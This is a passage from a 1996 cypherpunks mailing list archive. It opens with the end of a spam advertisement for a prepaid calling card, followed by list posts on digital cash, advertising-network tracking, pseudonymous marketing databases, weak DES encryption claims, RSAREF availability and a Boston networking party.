                           "No other card even comes close!"

<$> Provides Complete Privacy...Protection for unlisted numbers or from ID
       scanning!

<$> Full Service Calling Card...Covers all 50 states and International calls
       at super-low rates!

<$> Gives You Total Fax Coverage Worldwide...It not only accepts and       
        stores faxes sent to you, it will transmit your faxes anywhere you                             want.  It even allows you to send a pre-stored fax to any of your                               prospects  -  just like the major companies do!

<$> Instant Call Forwarding...Use this service to forward all your calls ---
       even to your cellular phone!

<$> Why Settle for 3-Way Calling From Just Your Office Phone?...The
       InteleCard(sm) let's you conference up to 70 people into the same
       conversation from any phone --- without an operator. You save $50 or
       more in service charges! 

<$> Offers a Concierge Wake-Up Service...Calls you in the morning to get     
        you up in plenty of time for an important appointment!

<$> Reach Out to the World...Allows you to call anywhere in the world and
       also have exceptional call-back rates when you travel abroad. A must
       for the world of international business!

<$> Se Habla Espanol...This card offers instructions in Spanish and (soon) 
        a  lot more languages!

<$> Speed Dialing...Let's you pre-program up to 99 numbers for instant
       access!

<$> Giant Network Broadcasting Capabilities...You can instantly send a fax 
        or broadcast a telephone message to 999 people on the system for the
       price of 1 phone call!  

<$> More Persistent Than A Hound Dog on a Scent...Gets your important
       messages through even while you're running to catch a plane. If the
       line is busy, it will keep calling for up to 4 hours to deliver your
       message.

<$> Money-Saving Sequence Calling...Beat the hotel telephone surcharges.  
       Once you're connected to the toll-free 800#, you can get all your       
       messages and faxes and make as many local or long distance 
       (Including International) calls as you wish!

<$> Your Electronic Secretary...Reminds you of birthdays, anniversaries,
       important meetings, etc. --- up to 1 year into the future!

<$> No Monthly Service Charge...Forget the $25 (or higher) monthly fees
       charged by other services!

<$> No Monthly Minimums...You can use the card as much or as little as 
        you choose!

<$> No Annual Renewal Fee...Your one-time low purchase price covers you             Life

<$> No Surcharge...You only pay for the time you talk --- with absolutely no
       connection fee. This feature alone can save you up to 80 cents per
       call!

<$> Bills in 6-Second Increments...Doesn't gouge you with full minute
        charges like the competition!

<$> Unbeatable Rates...What other card allows someone to call your private
         800# from Hawaii, New York, Alaska, or anywhere else in the U.S. for
         only 11 cents a minute?

<$> Unbelievably Low Cost...This entire collection of high-tech services
       could easily cost you $25...$50...$75 or more a month! Instead, it's
       all yours for a one-time administration fee of only $49.95!

<$> Plus...A Valuable FREE Bonus!

A Full 800# Telephone Service that allows any of your customers or
prospects to listen to your pre-recorded announcements, leave messages,
place orders, or send faxes to you (even if you don't have an office fax
machine) all without tying up your office phone lines or taking the valuable
time of your staff!

Or, if you wish, you can instruct your personal 800# to ring directly to your
office or home. 

It can even follow you around the world! 

The InteleCard(sm) puts you in full command! You can instantly change the
calling format from any phone anytime you wish, as often as you like. There
is no other card or service like it! 

The InteleCard(sm) places an entire portfolio of Advanced
Telecommunications services ready to work for you. 

The Immediate benefits for your business are staggering! 

You'll wonder how you and every one of your key people ever got along
without it!

                    "The InteleCard(sm) is here now and we have it!"

                                     Contact Us at:
                    Telephone: 800-481-7625   Fax: 800-676-8672

Because of the restricted quantity available, each business is limited to
only seven cards.

I urge you to order several today and beat the June 21st deadline. 

Once this supply is exhausted, you will have to purchase the newer, more
expensive cards. 

Remember, there is never a monthly charge or annual renewal fee with the
InteleCard(sm). Many businesses control their costs and internal
communication systems by providing a card to each key employee (not to
mention members of their family!).  

Use the order form at the end of this message to request your
InteleCards(sm) today.

Sincerely,

Kal Schmidt/Barry Disney SKP-1
Network Marketing Group. Inc
Voice 800-481-7625
Fax  800-676-8672


P.S. These deeply discounted promotional rates will expire in just a few
more days. Every card you order before June 21, 1996 will be grand-fathered
in at these low rates forever! Decide how many cards you will need now.
This once-in-a-lifetime opportunity will never be offered by us again!

Here's How To Order Now!

                       "Your No-Risk Unconditional Guarantee"

Inspect your InteleCard(sm) for 30 days entirely at our risk. Closely examine
every one of its exceptional features. Calculate the hundreds of dollars it
will save you year after year. Carefully weigh its unmatched convenience
and ease of use. Then, if for any reason you don't agree it is far and away
the best telecommunications deal you ever made, simply return the unused
card for an immediate refund. No questions asked.  

What could possibly be more fair?

Your rates are even lower if you order before June 21, 1996. You only pay .10
per minute for Voice and Fax Mail and just 17.5 per minute for Calling Card
charges.

Date Ordered:________________
No. Cards Ordered:_____
Amount: $_________
Check No:________   Credit Card

KEEP THIS PORTION FOR YOUR RECORDS

---------- detach before mailing ---------- detach before mailing ----------

USE THIS FORM TO FAX - MAIL - OR PHONE IN YOUR ORDER

For Immediate Priority-Order Processing - Please Fax , Phone, or Email Your Orders.

We pay the shipping costs on all Phone/Fax/Email Orders in the next 24 hrs.

Instant Phone Orders To: 800-481-7625  (24 hrs order line)

Fax To:  800-676-8672 (24 hrs)
Email To: kal@pwrsite.com
On-line ordering at: http://www.pwrsite.com

Mail To: Network Marketing Group, Inc  204 N Oak Suite 213, Owatonna, MN 55060


Please send me _____ (Limit 7) InteleCards(sm) at only $49.95 each,
postpaid. If not satisfied, I reserve the right to return unused cards for a full
refund.

Special:   Order 3 InteleCards(sm) for only $139.50 (You Save $10.35!)
                  Order 4 InteleCards(sm) for only $178.00 (You Save $21.80!)
                  Order 5 InteleCards(sm) for only $217.50 (You Save $32.25!) 
                  Order 7 InteleCards(sm) for only $299.70 (You Save $49.95!)
                    --- It's like getting 1 Card FREE!)

Print Your Name________________________________________________

Telephone Number (______) _______ - ________________

Fax Number          (______) _______ - ________________

Business Name ________________________________________________

Address ______________________________________________________

City _____________________________________State____Zip___________

Enclosed is $_________ 

Circle One:  

Check / Money Order    Payable to: Network Marketing group, Inc

Phonechecks - FAX your check to:  800-676-8672

Credit Card:    Visa      MasterCard     

Credit Card No:________________________________ Exp. Date____/____

Signature________________________
(for email orders you may type your name here or type in CALL ME to have
us call you to privately record your credit card information)

For more information (check your interest) 

____ Please send me information on how I can get the best phone deal for   
my  business/home as well.

____ I may be interested in marketing these cards. Tell me more.

USE THIS FORM TO FAX - MAIL - OR PHONE IN YOUR ORDER


Fax To:  800-676-8672 (24 hrs)
Phone Orders To: 800-481-7625   (24 hrs order line)
Email To: kal@pwrsite.com
On-line Ordering at:  http://www.pwrsite.com

Mail To: Network Marketing Group, inc  204 N Oak Suite 213, Owatonna, MN 55060





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Sat, 15 Jun 1996 10:15:17 +0800
To: cypherpunks@toad.com
Subject: Re:
In-Reply-To: <m0uUQLd-000357C@mail.iglou.com>
Message-ID: <19960614111725.14796.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


Blake Wehlage writes:

 > They will never be able to regulate the net, look at he first and main use
 > for it. 

What main use?  Flaming assholes who really deserve it?

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software sells packet driver support     | PGP ok
521 Pleasant Valley Rd. | +1 315 268 1925 voice | It's no mistake to err on
Potsdam, NY 13676       | +1 315 268 9201 FAX   | the side of freedom.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 15 Jun 1996 12:12:26 +0800
To: cypherpunks@toad.com
Subject: Cash Is Dying
Message-ID: <199606141129.LAA29891@pipe3.ny2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   6-14-96: NYT ad for The New York Times Magazine: 
 
 
   Cash is dirty. 
 
   Cash is heavy. 
 
   Cash is quaint. 
 
   Cash is expensive. 
 
   CASH IS DYING. 
 
   "You believe in banks don't you? That's good, because 
   ultimately money is backed by nothing but your own 
   confidence, habit and faith -- a form of faith as powerful 
   and essential to modern life as any religious belief. The 
   coming digital era will make this plain to everyone, as 
   never before." 
 
   (Continued on Sunday) 
 
   From "Dead as a Dollar" by James Gleick ...the cover 
   article in this week's issue. 
 
--------- 
 
   Yes, the James Gleick whose co-founded Pipeline is near 
   dead as a dollar. Hope his multi-million-dollar PSI-buyout 
   lives. 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sclawson@bottles.cs.utah.edu (steve clawson)
Date: Sat, 15 Jun 1996 12:01:48 +0800
To: declan+@CMU.EDU (Declan B. McCullagh)
Subject: Re: PBS show
In-Reply-To: <IlkDlaO00YUy1ODDgK@andrew.cmu.edu>
Message-ID: <199606141734.LAA11581@bottles.cs.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


Declan B. McCullagh uttered:
> I remember the Commodore 64
> drives (1541?) that were just plain slothful.

     Anyone else remember a program called TurboTape that Compute!
magazine published?  It actually made loading from tape faster than
from a 1541!  One of the cool things about the drive was that it used
GCR recording and had a variable number of sectors per track
(increasing as you went from the middle to the edge of the disk), so
it was able to fit around 180k per side!

     Commodore had some good drives on their PET's, but good old Jack
got burned by the fact that there was only one supplier of the cables
for the interface (IEEE-488, or [GH]PIB) and swore that they'd develop
their own. =) So for the VIC-20 they came up with a serial interface,
but because of problems with the chip they were using (6522 VIA) they
could only recieve a _bit_ at a time. =) On the C-64 they replaced
this chip with one that didn't have the problem (and thus could have
waited until it grabbed 8 bits from the serial line before bothering
the processor), but that would have meant they would have had to
redesign the drive...  Unfortunately, the increased demands of the
video hardware in the C-64 meant that they couldn't keep up with the
drive anymore!  So, in a stroke of genius, they slowed down the
transfer rate. =(

     The Atari 8-bits also used a serial bus for perhipherals, but at
least it ran at a (only somewhat moderately) respectable 9600bps. =)
Unfortunately their drives used the clunky 4:4 encoding for data, so
only held 90k per side.


steve

-- 
// stephen clawson				sclawson@cs.utah.edu
// university of utah			        





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh Sled" <jsled@cory.EECS.Berkeley.EDU>
Date: Sat, 15 Jun 1996 11:13:30 +0800
To: "Blake Wehlage" <tcmay@got.net>
Subject: Re: PBS show
Message-ID: <199606142023.NAA04410@pasteur.EECS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jun 96 23:23 EDT, Blake Wehlage wrote:

>Mac rule they have an awesome GUI (graphical user interface), easy of use it
>way up there and they have bitchin' software. 
>
>I know i will regret saying this but:
>
>The mac OS is 3 times better than Windows '95 

Though I agree with you, and I think OS/2's WorkPlace Shell and
Presentation Manager is about 10 times better than MacOS, this isn't
the place for GUI or OS holy wars...

ObCrypto: Incorporating crpyto into a GUI : strong crypto (RSA, 3DES)
represented as strong locking devices (safe, vault, etc), weak crypto
represented as weak devices (padlock, chain-link)... what do you think?

Joshy






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 15 Jun 1996 11:33:27 +0800
To: cypherpunks@toad.com
Subject: T & A
Message-ID: <199606141315.NAA25793@pipe1.ny1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


>From 6-14-96 Financial Times editorial supporting the CDA decision and
challenge to authoritarian regimes using moral righteousness to suppress
free speech: 
 
 
"Freedom to titillate is a small price to pay for freedom to argue." 
 
 
A T&A motto for cypherpunks? 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 15 Jun 1996 13:31:33 +0800
To: cypherpunks@toad.com
Subject: marketing "privacy": a nonproblem?
Message-ID: <199606142032.NAA28132@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



HF wrote a recent message about the "doubleclick" advertising
service. I don't know much about it but some things he mentioned
sparked my neurons. 

regarding privacy, it seems that there are a lot of different
views and specious arguments. we don't really have a clear idea
in our culture what privacy is or when it is really being 
invaded. is it being invaded when marketers create databases
of users and their preferences? this is a frequent topic of
conversation here. if we are on the side that says "yes", it
seems there is such an enormous industry pushing very hard
from the other side that a so-called "pro-privacy" position is
untenable. are marketers creating the equivalent of what TCM
calls "dossiers"?

I just had a brainstorm that perhaps the problem of marketing
clashing with privacy is completely nonexistent. what marketers
really want is to TARGET PEOPLE'S ATTENTION. they don't necessarily
want to know who those people are!! a rather paradoxical situation,
but the two are NOT the same. 

imagine that a marketer selling Widgets could send a direct mailing to 
people who have an interest in Widgets. now, currently what has
to happen is that marketers have to collect info on various people
and their interests, and then sort that for "widget interest" to
get their mailing list. but the overall database is in a sense
a dossier.

but what we should note is that the marketer DOESN'T CARE at all
about the real identity of the people he is mailing to. in fact
it is totally superfluous. he only wants to send his literature
to people who are interested in widgets, and he doesn't care who
they are or their other interests. in fact, marketers keep track
of "other interests" only insofar as they can be used to correlate
with what they are actually trying to screen for.

so what I am getting at is that I think "dossiers" tend to associate
a lot of information about a real person, in a way that people
can get info on that person given their name or whatever. the point
is that marketers don't really care who is who, and don't really
want to necessarily have a database that gives the real identity
of people. they only need a way of delivering their literature
to people with particular interests.

let me give an example to clarify this. suppose a database existed
somewhere that contained a total profile of me and all my interests.
but I am not called "V.Z.Nuri" in the database, but #3343. furthermore,
there is an "address" in that database, and it can be used to reach
me, but it is unique to that database and can't be found in any other,
and furthermore, no one can correlate that address with my real 
identity.

voila-- the marketer doesn't really want anything more than this. 
yet in a sense my privacy is completely protected. suppose that
police agent tries to query the database to get info on me. if it
really is secure, all he has is info that can never be tied to 
me. such a system creates a very important use for anonymous remailers.
of course digital cash plays a big role in this too.

in the same vein, it is possible for me to "buy" something from a 
company without them knowing that it was in result to them
sending information to so-and-so identity #3343. actually, it could
be set up that I tell them, "I am responding to your direct mail
ad campaign #1634" so they can gauge the efficacy of their advertising,
but they don't know who of their database was involved. 

when I think of "dossiers" I think of info that can be tied to
REAL PEOPLE. but it is quite possible to create an "interest 
distribution system" that would keep marketers happy but still
not be able to be tied to people's real identities. when one thinks
of the horrors of classic privacy abuse, one thinks of the way
the Nazi's grabbed (Dutch?) records to find jews, or the way the
NSA kept files on people and responded to Nixon queries for
radicals. but it seems to me it would be possible to create a system
in which people's interests are tracked, yet their real identities
are dissociated from that information. furthermore, you can dissociate
the mechanism to do so-- anonymous remailers have no connection to
companies that deliver info through them.

notice that much of the above can be achieved in cyberspace with
the use of a pseudonym. if you are signed up through a provider
that protects your identity (most of them do), then you can do
whatever you want in cyberspace and theoretically nothing can
be tied to your new identity. furthermore, if you think you have
accumulated too much "baggage" associated with your current identity,
you can always start afresh.

===

this will sound quite heretic, but I think marketing is actually a
very legitimate business and that cpunks might actually achieve some
of their goals by considering how to create a better marketing system.
in essence, marketing is the attempt to match up people with information
and products that interest them. in a way, this is a very similar
problem to trying to match up people to mailing lists and newsgroups
and articles/files that interest them. spamming is the cyberspatial
equivalent of a problem that existed before cyberspace: junk mail,
so to speak. 

is there an efficient system whereby suppliers and consumers 
can be matched up, but at the same time preserving privacy? 
it seems to me a key question of information technology, perhaps
a "killer app" in this area is just now waiting to be born.
that's all that marketers want, and in fact instead
of seeing them as agents of satan, we should just see them as trying
to fulfill customer desires with their own products-- the essence
of capitalism. the fact that marketers in our culture are so aggressive
speaks of how effective capitalism is.

people see junk mail as "junk", but notice that the junk is in
the eye of the beholder. what if you got on a direct mailing list
that sent you info on products you were considering buying anyway?
in a sense, "junk mail" is mail that we don't care about, not 
merely mail from marketers. we get mail from marketers all the
time that we appreciate!! if someone can create a more foolproof
system that preserves privacy at the same time, all worlds are
satisfied. you have the marketer happy, the consumer happy, and
the privacy protection too.

as long as one tries to defy marketers basic drive of trying to
target people with particular interests, I think this is fighting
the wind or trying to stop the river. but if one could find 
a way of supporting their basic motivation, the scenario becomes 
totally transformed.  building a marketing mechanism that preserves
privacy may do far more for privacy protection in the future
than a zillion remailers. I think the key is to analyze why people
*want* to do things that seem to violate privacy (such as marketers),
and then finding new ways of doing the same thing while preserving privacy,
rather than trying to defy their basic drives (such as collecting
information on potential customers etc.).

===

imagine a massive cyberspace system that was actually a database
of everyone who wanted to register, containing their interests.
it would be an accepted practice that all marketers could use
this system. people would register if the system was actually
effective in only sending them info that they really wanted to
see. it would be like an index into the population the
way Yahoo is currently an index into cyberspace. one could create
guidelines and measures by which spamming could be minimized.
the database might be able to minimize the effect of bad marketers
and indiscriminate mailings etc.  it seems like a very interesting
problem worthy of attention.  the returns for someone who could
pull off such a thing would be tremendous. 

I continue to believe that many problems that people are 
insoluable or in eternal conflict, such as marketers 
and privacy, could be harmonized with some sharp ingenuity.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sat, 15 Jun 1996 10:18:00 +0800
To: cypherpunks@toad.com
Subject: Web Based Decrypted Backup
Message-ID: <199606141818.OAA27286@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 13 Jun 96 at 14:23, Jamie Lawrence wrote:

Disconnected Corporation announced SortaSafe, a Mac/Windows web based
backup service.
 
[..]

>From thier site:
> 
> -------
> Insecurity
> 
> SortaSafe uses the federally approved Data Encryption Standard (DES) with a
> 56-bit key to encrypt
> all of your data before it leaves your PC. This level of encryption is so
> powerful, only people with several thousand dollars can decrypt it.

...


 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sat, 15 Jun 1996 10:08:30 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: doubleclick monitoring web browsing habits
Message-ID: <199606141818.OAA27290@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 13 Jun 96 at 16:19, Hal wrote:

> A post on comp.risks described a web adverstising service called
> "doubleclick".  As described in its web pages at <URL:
> http://ad.doubleclick.net >, this service provides targetted
> advertising on the web.
[..]
> One question is whether enough information to uniquely identify users
> is routinely provided by widely used browsers like Netscape.  I have

Supposedly Netscape has been responsive to this.  One of the changes 
in 2.0 had to do with giving out personal info (and people can verify 
this if they have the servers, etc.)

> refrained from telling my Netscape browser my name and email address out
> of fear that it would reveal this information; as a result, I can't use
> mailto: links, which is annoying (and also suspicious; lynx allows me to
> do mailto: without permanently entering an email address).

Lynx running under Unix can find out who you are on the system by 
checking your user id and the hostname.

Rob.

 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 15 Jun 1996 11:11:54 +0800
To: cypherpunks@toad.com
Subject: Re: doubleclick monitoring web browsing habits
Message-ID: <199606142126.OAA11951@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
> Lynx running under Unix can find out who you are on the system by 
> checking your user id and the hostname.

When I run lynx (2.3.7 beta) to <URL:
http://www.anonymizer.com/cgi-bin/snoop.pl >, it says:

   Here's a sampling of the kind of information that a site can collect
   on you (please wait a moment):
 
 
     Your computer is a Unix box.
     Your Internet browser is Lynx.
     You are coming from jobe.shell.portal.com.
     You just visited the Anonymizer Home Page.

No user name here.

Also, when I follow a mailto: link it asks me to input the email address
I want the mail to be from!  So I don't think it is using local user name
information, although certainly that is potentially available to it.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Sat, 15 Jun 1996 10:17:33 +0800
To: "William R. Ward" <reagle@MIT.EDU>
Subject: Re: [NOISE] Re: PBS show
Message-ID: <m0uUdoy-00035gC@mail.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:06 PM 6/13/96 -0700, William R. Ward wrote:
>
>I'm delurking here ... just signed up on cypherpunks, though I've
>known about it for a long time.
>
>I don't watch TV, don't have cable, and thus can't watch this PBS show
>everyon's a-buzz about.  I would like to see it, though.  I would be
>most grateful if someone who has taped it could loan me the tape so I
>could watch it.
>
>I live in Santa Cruz, CA, and work in Mountain View; surely someone in
>the south bay has been taping this?  I hope so.
>
>--Bill.
>
>
>
Hey Bill, they made VHS tapes for sale it the whole set, I would buy it. It
was based on a book so pick up the book.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Blake "Pokey" Wehlage Age-13 Gaa- 3.69 (for ice hockey goalie)
<jwilk@iglou.com> My page- http://www.iglou.com/members/jwilk.html
Quote- Does whiskey count as beer? -Homer Simpson          





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@arc.unm.edu>
Date: Sat, 15 Jun 1996 10:55:11 +0800
To: cypherpunks@toad.com
Subject: Applied Cryptography - used copy?
Message-ID: <1.5.4.16.19960614211928.326fad06@arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Does anyone have a used copy of Applied Cryptography they'd like to
get rid of? (Reply to drosoff@arc.unm.edu)

===============================================================================
David Rosoff (nihongo o chiisaku dekimasu)  ------------->  drosoff@arc.unm.edu
For PGP key 0xD37692F9, finger drosoff@acoma.arc.unm.edu or get from keyservers
pub  1024/D37692F9 1995/07/01 David Rosoff <drosoff@arc.unm.edu>
          Key fingerprint =  25 7D AA 01 85 41 43 89  50 5A 33 76 F1 F1 99 67
I accept anonymous mail. If I didn't sign it, you don't know I wrote it.
===
"Made weak by time and fate, but strong in will / To strive, to seek, to find--
and not to yield." <---- "Ulysses", by Alfred, Lord Tennyson

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMcHXRBguzHDTdpL5AQFiQgP+Mj545SMMlj70nJzZhFnHiCvNZ0bx/qJy
MFhKIZKX6fGINewAgHwscgPiXpQ1mRndp0K2PGeZi0IeaX7pxqZN3Mr8LEQ48Ltz
CKc8zolmIIq2cRYC2bmeEDbgLNk6arct2XcJ8DMD0hBd9JMtZlX0OUo53li/zz8p
dWEwYo655Sc=
=xnql
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@prairienet.org>
Date: Sat, 15 Jun 1996 10:28:00 +0800
To: Blake Wehlage <jwilk@iglou.com>
Subject: Re: PBS show
Message-ID: <1.5.4.32.19960614202430.0067bda4@204.248.40.2>
MIME-Version: 1.0
Content-Type: text/plain


>I know i will regret saying this but:
>
>The mac OS is 3 times better than Windows '95 
>

Gee, what's three times zero?

dave






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 15 Jun 1996 11:36:53 +0800
To: cypherpunks@toad.com
Subject: Re: Level30 Newsletter (fwd)
In-Reply-To: <Pine.BSD.3.92.960614025524.25568B-100000@miso.wwa.com>
Message-ID: <199606142250.PAA11350@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


[Right wing pressure group censorship crap deleted]

Does this document strike anyone else as remarkably similar to the 
propaganda put out by another pressure group, the National Coalition
Against Pornography, which was heavily funded by the millions
Charles Keating stole from his investors?

Have the bozos regrouped, changed their name, and gone online?

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 15 Jun 1996 10:59:20 +0800
To: cypherpunks@toad.com
Subject: Does information want to be free?
Message-ID: <Pine.LNX.3.93.960614164556.394A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

For those interested, there is an article in the latest Scientific American
about copyright laws and how they will be applied to the Internet.  It used
the banned French book about the former president as an example of just how
difficult it is to regulate information.  It also addresses whether routers
(or analogously anonymous remailers) should be held liable for any copyright
violations that may pass through them.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"In Christianity neither morality nor religion come into contact with
reality at any point."
                -- Friedrich Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMcHQnbZc+sv5siulAQFcGAQAj5/LnS2usgN0ElYuH14inFZfLe3bZ6gW
gyzSsuIjOp21PSfeCerQSM+7Q5DHj4EV1E17q64Npqx+q8I+bBpHOdMJuTJrRSBI
M6dvmAVSB/mgcdO6rvGK5dezWTzofa+4Koo3OxGmiAtnRfcGIIN1ojo/MboIRf/u
6dlThDkaIN4=
=0AlF
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 15 Jun 1996 10:12:21 +0800
To: Howard Melman <melman@osf.org>
Subject: Re: RSAREF down?
In-Reply-To: <9606132300.AA16648@absolut.osf.org.osf.org>
Message-ID: <Pine.LNX.3.93.960614165445.394B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 13 Jun 1996, Howard Melman wrote:

> 
> Anyone know anything about this?
> 
> tmp> ftp ftp.rsa.com
> Connected to ftp.rsa.com.
> 220-
> 220-Welcome to the RSA Data Security, Inc. FTP Archive.
> [...]
> 220-***************** Special Announcement *******************
> 220-
> 220-    RSAREF has been taken down until further notice.
> 220-    We will keep you informed for any new announcement.
> 220-
> 220-***********************************************************

I noticed this a couple of weeks ago.  I don't know what the problem with RSA
is, but RSAREF is available at ftp://ftp.replay.com/pub/replay/pub/crypto/LIBS/
rsa/ .

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"In Christianity neither morality nor religion come into contact with
reality at any point."
                -- Friedrich Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMcHS5LZc+sv5siulAQFVUAP7BSrv8Vdu+URobw6M9+9Bu3oV+XSiTege
p4i7rp3IJOi7nY3y0AztejpxGs2gLVF0Puc4wxNZhjakpSk/SZReg2DoqMZgspZo
P0bQii5YQEl24o4rKvcJs4CdS3ed8Wszn8Uar9+rsgPVMU+Sezdt0RkZpyolgMQm
ndMpiboLqcQ=
=IHn2
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 15 Jun 1996 11:12:11 +0800
To: dcsb@ai.mit.edu
Subject: Party!
Message-ID: <v03006f15ade77cf202b4@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


The upshot of the attached missive is quite simple, really.

RSVP to Julie Rackliffe, mailto://RACKLIFFE@tcm.org , before say, 2PM EDT on
Monday, and tell her you're coming. Stragglers aren't frowned on, but we
need to do a some capacity planning beforehand. Wanna make sure we print up
enough drink tickets, alert the kitchen and the police, and all that.

Get on your best bib and tucker (jackets and ties for men, "appropriate
business attire" for women).

Go to the Harvard Club, 1 Federal Street, Boston, on Thursday, June 20, 1996
from 5-8 pm.

Collect your two complementary drink tickets.

Thank the folks from OSF, who're sponsoring our first-ever DCSB networking
event.

Hit the table of complementary munchies for some necessary sustenance.

Head to the bar, cash in one (or both) of your drink tickets and...

.................schmooze.



Easy, you say?

Show us how easy.

Be there.


Aloha,
Bob Hettinga
Moderator,
The Digital Commerce Society of Boston

- - --- begin forwarded text


Date: 14 Jun 96 07:43:06 EDT
From: "Julie Rackliffe" <RACKLIFFE@tcm.org>
Subject: Party!
To: "dcsb" <dcsb@ai.mit.edu>
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: "Julie Rackliffe" <RACKLIFFE@tcm.org>

Greetings, all and sundry!

I am delighted to announce that my internet connection is now back on line
and I
can receive the MANY MANY RSVPs for next Thursday's party that you've been
trying to get through and they've bounced back. SEND THEM ON!

It's going to be a great time and a perfect opportunity to talk to the
people
you rarely get to talk to, to introduce friends to the dynamic and exciting
world of DCSB and to nosh the best nosh, imbibe just the right amount and
enjoy
a beautiful kick off to a wonderful summer.

Do Come!

If you've tried to send me mail in the last two days, try again. If you sent
it
before that and got no error message, consider yourself golden. Thanks! I
need
responses TODAY!!! (Monday is the very latest and it's not good to toy with
this
volatile museum quality internet link. thanks :)  )

Julie

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To unsubscribe from this list, send a letter to: Majordomo@ai.mit.edu
In the body of the message, write:  unsubscribe dcsb
Or, to subscribe,           write:  subscribe dcsb
If you have questions, write to me at Owner-DCSB@ai.mit.edu

- - --- end forwarded text

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMcHQxvgyLN8bw6ZVAQG06QP/akD1VZumvzGMw552LeCk5YPPICsZt+EG
wyHa69h6t3L3ud9Cla5tiRXHEKapu4S19udVyPFL37k5zPJJFfTQ/p8HGVzJgOYm
Gu1hoJQNLdF244y5x2OuaFLE9RX1C2T0l7zqum+DLMNOqlZ/dHM1+ApKX+CQaAMi
vjryIo7AsHU=
=OlZI
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Bell <dbell@maths.tcd.ie>
Date: Sat, 15 Jun 1996 10:21:50 +0800
To: grafolog@netcom.com>
